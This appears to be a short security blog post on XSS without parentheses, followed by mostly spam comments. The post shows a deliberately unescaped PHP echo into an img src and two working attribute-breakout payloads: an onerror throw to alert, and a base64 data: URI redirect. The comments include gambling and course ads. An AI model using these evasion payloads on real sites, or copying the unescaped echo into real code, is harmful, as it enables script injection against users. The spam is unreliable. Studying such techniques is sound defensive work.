Let's assume that injection takes place in img tag src attribute:
<!-- http://example.com/image.php?filename=INJECTION -->
...
<img src="<?php echo $_GET['filename']"; ?> >
...
One approach is to use exceptions as is described
here. So the injected code (filename param) should look like this:
fileThatDoesNotExist" onerror="javascript:window.onerror=alert;throw 'XSS'" dummyParam="
Resulting in:
<!-- http://example.com/image.php?filename=INJECTION -->
...
<img src="fileThatDoesNotExist" onerror="javascript:window.onerror=alert;throw 'XSS'" dummyParam="" >
...
But I'd like to show you another way to do XSS without parentheses and brackets by using location.href and "data:" URI with base64 encoding. Let's inject <script>alert("XSS")<script/> code (in base64 is PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=). So crafted parameter should look like this:
fileThatDoesNotExist" onerror="location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4='" dummyParam="
Resulting in:
<!-- http://example.com/image.php?filename=INJECTION -->
...
<img src="fileThatDoesNotExist" onerror="location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4='" dummyParam="" >
...
nice ;)
ReplyDeleteAny reason why you use location.href , any other DOMs can be used?
ReplyDeleteExcellent to be visiting your blog again, it has been months for me. Rightly, this article that I've been served for therefore long. I want this article to finish my assignment within the faculty, and it has the same topic together with your article. Thanks for the ton of valuable help, nice share. https://aquafiltermag.com/
ReplyDeleteI admire this article for the well-researched content and excellent wording. I got so involved in this material that I couldn’t stop reading. I am impressed with your work and skill. Thank you so much. Check it out
ReplyDeleteMactan Island 근처에 위치해 있는 이 숙소에는 정원 내려다 보이는 48개의 객실이 있습니다. Moalboal Public Market 근처에 위치해 있는 이 숙소에는 대양 내려다 보이는 26개의 객실이 있습니다. LCT Star II 근처에 위치해 있는 이 숙소에는 바다 내려다 보이는 54개의 객실이 있습니다.
ReplyDeletePG88 เว็บตรงสล็อตออนไลน์ PG SLOT สล็อตออนไลน์ได้กลายเป็นทางเลือกที่ยิ่งใหญ่และน่าสนใจสำหรับนักพนันในยุคปัจจุบัน PG การเล่นสล็อตผ่านทางอินเทอร์เน็ตนั้นสะดวกสบายและเข้าถึงได้ทุกที่ทุกเวลา
ReplyDeleteExcellent post! Learning aws devops training
ReplyDeletehelps professionals manage infrastructure, automation, and deployment pipelines. Our training includes hands-on labs and real project experience.
An ai ml course teaches learners how artificial intelligence and machine learning technologies work together to create intelligent systems. It explains data processing, predictive modeling, and algorithm design used in modern AI applications. This ai ml course helps students understand how machines learn from data to improve decision-making. Learners practice model building through coding exercises and projects. The course helps them gain skills needed for AI and machine learning careers.
ReplyDelete